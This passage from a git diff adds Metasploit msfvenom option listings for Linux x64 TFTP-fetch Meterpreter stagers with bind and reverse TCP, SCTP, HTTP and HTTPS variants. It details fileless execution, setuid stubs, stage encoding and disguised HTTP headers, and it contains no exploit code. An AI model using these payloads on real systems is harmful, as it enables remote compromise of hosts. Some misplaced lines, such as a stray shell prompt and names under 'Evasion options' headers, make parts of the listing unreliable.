spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..38d0ece --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-bind_tcp.txt @@ -0,0 +1,97 @@ + + Name: TFTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/tftp/x64/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Brent Cook + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME VcBbaFZqa no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_sctp.txt new file mode 100644 index 0000000..144d1c3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_sctp.txt @@ -0,0 +1,103 @@ + + Name: TFTP Fetch, Reverse SCTP Stager + Module: payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 111 + +Evasion options for payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp: +========================= + +tman@sempervictus> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HxVPqzQcPUH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..7a0b191 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 105 + +Evasion options for payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp: +========================= + + + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vtFesbcFZ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..49ed243 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_http.txt @@ -0,0 +1,103 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/x64/meterpreter_reverse_http: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HRmFbVJGsD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..2c17f83 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_https.txt @@ -0,0 +1,105 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/x64/meterpreter_reverse_https: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NfyFMMWn no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..30df9c9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_tcp.txt @@ -0,0 +1,96 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QyRlHtkVN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path 